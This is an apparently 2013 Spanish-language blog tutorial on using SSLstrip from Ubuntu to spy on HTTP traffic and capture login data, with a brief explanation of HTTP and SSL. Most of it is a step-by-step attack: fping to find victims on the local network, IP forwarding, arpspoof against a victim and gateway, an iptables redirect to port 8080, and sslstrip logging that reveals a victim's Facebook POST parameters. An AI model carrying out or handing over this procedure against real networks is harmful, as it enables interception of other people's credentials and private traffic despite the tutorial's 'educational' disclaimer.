Cdigo & Tutoriales para Principiantes

marte s, 29 d e o c tu b re d e 2013

Sslstrip: Tutorial en espaol (Espiando trfico http) desde Ubuntu linux

Hola ! El da de hoy te mostrar como espiar trfico http para obtener datos Post y Get desde distribuciones de linux, yo usar ubuntu, pero t puedes usar la que prefieras. Antes que nada quiero aclarar que este tutorial lo hago con fines educativos " El conocimiento es libre" cada quien se hace responsable del uso que le de.

Materiales que utilizaremos

Sslstrip (Descargar) Fping (sudo apt-get install fping) Python [Linux lo incluye por defecto](Descargar)

Qu es y Cmo funciona?

HTTP Todos los datos que t envas y recibes a travs de un navegador web tales como mensajes, formularios o inicio de sesiones se comunican por medio del protocolo http (Hypertext Transfer Protocol) se basa en la arquitectura de Cliente - Servidor esto quiere decir que funciona con Peticiones - Respuestas. Ejemplo: cuando t quieres entrar a facebook.com a travs de un cliente web estas haciendo una peticin al servidor web de facebook y te responde con un html que se traduce al diseo de la pagina que ves en tu navegador. SSL Secure Sockets Layer, algo que se traduce en Capa de Conexin segura ahora "TLS", ssl proporciona autentificacin y privacidad, encriptando la informacin que se enva por medio del protocolo http tales como mensajes, usuarios y contraseas.

Arc hivo del Blog

2013 (3) octubre (3) Sslstrip: Tutorial en espaol (Espiando trfico ht... Administrar Permisos de Windows con Editor de Dire... Tutorial de SQL Injection con Sqlmap (En espaol)

Ejemplo: cuando el trfico de una pagina esta viajando de forma segura se puede apreciar al inicio de la url "https ://facebook.com" por lo contrario la informacin no segura "http://paginaweb.com". Recapitulando Convierte todo el trfico https en http sin cifrar y lo captura para luego mostrarnos las peticiones que se realizaron, se puede apreciar este cambio por el prefijo " https " que se sustituye por " http " la desventaja de esto es que solo funciona en una red local.

Iniciemos el tutorial
Como te mencion anteriormente yo usare la nueva versin de Ubuntu 13.10, t puedes usar la que prefieras o se adapte mejor a tus necesidades. Antes que nada, necesitamos las direcciones IP's de la victima, y de el Servidor. Cmo conseguimos la direccin ip? Bueno el primer paso es saber como est "estructurada" nuestra red , para eso: ifconfig

Nuestra ip es " 192.168.1.64" en este caso pero, Y las dems computadoras? Para esto existe un comando llamado fping:

Ejecutamos en la terminal: sudo apt-get install fping Y despus escaneamos los hosts guardndolos en un archivo " fping -a -g <ipInicial> <IpFinal> > hosts" Ejemplo: fping -a -g 192.168.1.1 192.168.1.254 > hosts Para finalmente leer la lista de hosts: cat hosts

Usaremos 3 terminales para ingresar los siguientes comandos:

Terminal 1:
//Accedemos como Root o Super Usuario sudo -sH //Activamos IP Forwarding echo 1 > /proc/sys/net/ipv4/ip_forward //Ejecutamos el comando arpspoof -i <interfaz> -t <VictimaIP> <Servidor> arpspoof -i wlan0 -t 192.168.1.104 192.168.1.254

Terminal 2:
//Redireccionamos el trafico http del puerto "80" al "8080" sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 //Ejecutamos sslStrip indicandole "-w" que lo guarde en un archivo y "-l" que escuche por el puerto 8080 sslstrip -w cap -l 8080

Terminal 3:
//Finalmente el comando Tail para leer la informacin tail -f cap

Finalmente el resultado:

El navegador de la victima muestra que la informacin no est viajando de forma cifrada, pero sin ninguna advertencia por parte del navegador, el usuario ingresa sus datos normalmente:

Y la informacin nos llega a la pantalla de captura:

Todo se muestra normal al ingresar a la pagina:

No hace falta nada ms, la informacin nos ha llegado, en ella incluye el tipo de datos (POST/GET) la url (facebook.com) y finalmente los parmetros. Y eso es todo! muchas gracias por leer este post.
Publicadas por Fernando Muoz a la/s 11:19 Recomendar esto en Google Etiquetas: capturar datos web, http traffic, linux, pentest, permisos, root, sniffers, sniffing, ssl, sslstrip, tls, trafico http, ubuntu, usuarios

No hay comentarios.: Publicar un comentario

Escribe un comentario...

Comentar como:

Cuenta de Google

Publicar

Vista previa

Pgina Principal Suscribirse a: Comentarios de la entrada (Atom)

Entrada antigua

ShaafDesign tutoriales. Plantilla Simple. Tecnologa de Blogger.